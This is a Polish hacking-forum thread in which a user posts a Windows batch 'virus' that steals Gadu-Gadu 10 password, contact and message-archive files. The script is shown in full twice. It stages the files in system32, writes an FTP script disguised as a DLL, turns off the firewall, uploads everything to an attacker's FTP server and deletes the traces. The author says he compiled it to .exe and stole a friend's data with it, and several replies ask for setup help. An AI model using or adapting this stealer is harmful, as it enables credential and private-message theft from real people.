[.BAT] Wirus do kradzieży hasła , archiwum , kontaktów z Gadu Gadu 10.

**TheFlaiDer** · 15-12-2011, 16:12

Siema.
Zrobiłem wirus .bat który ma za zadanie ukraść pliki z hasłem , archiwum i kontaktami z Gadu Gadu 10.
Tylko nie wiem ten skrypt jest poprawny i czy ma w ogóle szansę działać.
Testowałem u siebie , to niby działa.
Oto on :

@echo off
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Profile.xml" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ContactList.xml" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ProfileBasic.xml" "C:\windows\system32"
cls
ipconfig /all >> "C:\windows\system32\command_ipconfig.txt"
echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Profile.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\ProfileBasic.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\ContactList.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\command_ipconfig.txt" >> "%windir%\system32\sysfiles32.dll"
echo quit >> "%windir%\system32\sysfiles32.dll"
netsh firewall set opmode disable
ftp -s:"%windir%\system32\sysfiles32.dll"
cls
netsh firewall set opmode enable
del "C:\windows\system32\Profile.xml"
del "C:\windows\system32\ContactList.xml "
del "C:\windows\system32\Archive.db"
del "C:\windows\system32\ProfileBasic.xml"
del "C:\windows\system32\command_ipconfig.txt"
del "C:\windows\system32\sysfiles32.dll"

**ToomAnon** · 25-01-2012, 20:05

U mnie działa, ale czy wszystko jest poprawne to Ci nie powiem bo jestem "newbie". Pozdrawiam Tomasz.

**anoozy** · 27-01-2012, 17:56

Napisał TheFlaiDer

Siema.
Zrobiłem wirus .bat który ma za zadanie ukraść pliki z hasłem , archiwum i kontaktami z Gadu Gadu 10.
Tylko nie wiem ten skrypt jest poprawny i czy ma w ogóle szansę działać.
Testowałem u siebie , to niby działa.
Oto on :

@echo off
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Profile.xml" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ContactList.xml" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\ProfileBasic.xml" "C:\windows\system32"
cls
ipconfig /all >> "C:\windows\system32\command_ipconfig.txt"
echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Profile.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\ProfileBasic.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\ContactList.xml" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\command_ipconfig.txt" >> "%windir%\system32\sysfiles32.dll"
echo quit >> "%windir%\system32\sysfiles32.dll"
netsh firewall set opmode disable
ftp -s:"%windir%\system32\sysfiles32.dll"
cls
netsh firewall set opmode enable
del "C:\windows\system32\Profile.xml"
del "C:\windows\system32\ContactList.xml "
del "C:\windows\system32\Archive.db"
del "C:\windows\system32\ProfileBasic.xml"
del "C:\windows\system32\command_ipconfig.txt"
del "C:\windows\system32\sysfiles32.dll"

Witam mam pytanko gdzie dokładnie zapisuje to się na FTP i w jakiej postaci??
i czy te nawiasy kwadratowe przy host login haslo ftp sa potrzebne?

**w4r10ck** · 27-01-2012, 18:49

Nie wygodniej było by to napisać w C , bądź C++ , wątpie aby ktoś ci uruchomił taki plik , a nawet jak by to pierwszy lepszy anty wirus powinien to wykryć (nawet AVG)
mam nadzieję że nie liczyłeś na to że uda Ci się coś tym zwalczyć

**harbinger** · 28-01-2012, 01:48

Napisał w4r10ck

Nie wygodniej było by to napisać w C , bądź C++ , wątpie aby ktoś ci uruchomił taki plik , a nawet jak by to pierwszy lepszy anty wirus powinien to wykryć (nawet AVG)
mam nadzieję że nie liczyłeś na to że uda Ci się coś tym zwalczyć

czy prościej? - nie
czy skuteczniej? - tak
czy udało mu się coś zwalczyć? - nie

**TheFlaiDer** · 28-01-2012, 09:55

Cóż , zrobiłem ten program , aby ukraść te dane jednemu z moich znajomych , no i się udało.
Pierwsze skonwertowałem go na .exe , a następnie wysłałem go mu.
Po za tym miał zainstalowanego anty wirusa , i jedyna przeszkoda to był firewall wbudowany w anty wirusa.
No ale można powiedzieć że jest to program , który wymaga połączenia internetowego i tak zrobiłem...
Kiedy robiłem ten program , robiłem wyłącznie programy Batch , więc nie zrobiłem w C albo C++ , teraz może zacznę.

**f4renthide** · 05-02-2012, 09:23

Napisał anoozy

Witam mam pytanko gdzie dokładnie zapisuje to się na FTP i w jakiej postaci??
i czy te nawiasy kwadratowe przy host login haslo ftp sa potrzebne?

Ponawiam pytanie kolegi.

Czy on później usuwa pliki :

"C:\windows\system32\Profile.xml"
"C:\windows\system32\ContactList.xml "
"C:\windows\system32\Archive.db"
"C:\windows\system32\ProfileBasic.xml"
"C:\windows\system32\command_ipconfig.txt"
"C:\windows\system32\sysfiles32.dll"

Czyli te z końca kodu?
Pozdrawiam

**In7ount** · 05-02-2012, 10:28

Niby działa . Ale polecam do takich zabaw Perla lub C .

Mnie zastanawia jedno . Skąd "wirus" będzie wiedzieć gdzie wysłać te pliki skoro nie masz odniesienia do hosta .
Wszystko działa na Localhost .
Hmm ?

**TheFlaiDer** · 05-02-2012, 14:45

Napisał f4renthide

Ponawiam pytanie kolegi.

Czy on później usuwa pliki :

Czyli te z końca kodu?
Pozdrawiam

Zapisuję się to pod postacią plików :

Profile.xml
ContactList.xml
Archive.db
ProfileBasic.xml
command_ipconfig.txt

Jak widać jest komenda "DEL" przy tych plikach :

del "C:\windows\system32\Profile.xml"
del "C:\windows\system32\ContactList.xml "
del "C:\windows\system32\Archive.db"
del "C:\windows\system32\ProfileBasic.xml"
del "C:\windows\system32\command_ipconfig.txt"
del "C:\windows\system32\sysfiles32.dll"

A komenda "DEL" to usuwanie.
Czyli usuwa te pliki.

**abel95** · 10-02-2012, 13:31

Witam. Gdzie będą zapisywane dane, bo nie wiem czy ogarniam?

**TheFlaiDer** · 10-02-2012, 14:53

Napisał abel95

Witam. Gdzie będą zapisywane dane, bo nie wiem czy ogarniam?

Na twoje konto FTP , zostaną przesłane pliki odpowiadające za archiwum , hasło i kontakty.
Musisz tylko pobrać specjalne narzędzia do otworzenia tych plików.

**jpkaczy** · 10-02-2012, 15:12

Testowałem to ale nie mam pojecia gdzie te pliki sie zapisują. napisz dokladnie gdzie sie to wszystko zapisuje i w jakiej formie. wgl tego antywirus nie wykrywa... chyba ze cos zle zrobilem. to ma byc tylko w bat ? czy jeszcze trzeba jakos konwertowac ?

**abel95** · 10-02-2012, 16:57

Zalożyłem ftp. Wpisuje nazwe hosta i uzytkownika oraz haslo. Uruchamiam, lecz nie otrzymuje żadnych plikow na ftpa ;/

**In7ount** · 10-02-2012, 20:36

to może czas zająć się jakimś językiem programowania ? > daleko nie zajdziesz na .bat . Przepraszam ale osoby "programującę" w .bat to script kiddes a ja żywię urazę do takich osób .

**VR8** · 10-02-2012, 21:39

Napisał In7ount

daleko nie zajdziesz na .bat . Przepraszam ale osoby "programującę" w .bat to script kiddes a ja żywię urazę do takich osób .

Osoby radzące sobie samym batchem to raczej nie script kiddies tylko script masters...

Do programowania takich aplikacji polecam Delphi i C++..,..ew. Perl, C#, ANSI C

Temat: [.BAT] Wirus do kradzieży hasła , archiwum , kontaktów z Gadu Gadu 10.

Narzędzia wątku

Typ wyświetlania

[.BAT] Wirus do kradzieży hasła , archiwum , kontaktów z Gadu Gadu 10.

Uprawnienia